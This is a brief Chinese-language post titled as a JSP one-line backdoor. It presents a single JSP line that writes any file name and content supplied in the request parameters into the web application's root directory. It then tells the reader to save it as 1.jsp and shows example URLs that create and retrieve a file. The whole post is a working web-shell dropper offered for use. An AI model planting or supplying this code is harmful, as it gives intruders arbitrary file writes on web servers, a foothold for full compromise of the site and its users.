JSP一句話後門
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
這個 後門估計不用我說了吧.還是提示一下咯.保存爲1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然後:http://localhost/1.txt 就出來了 內容爲 hello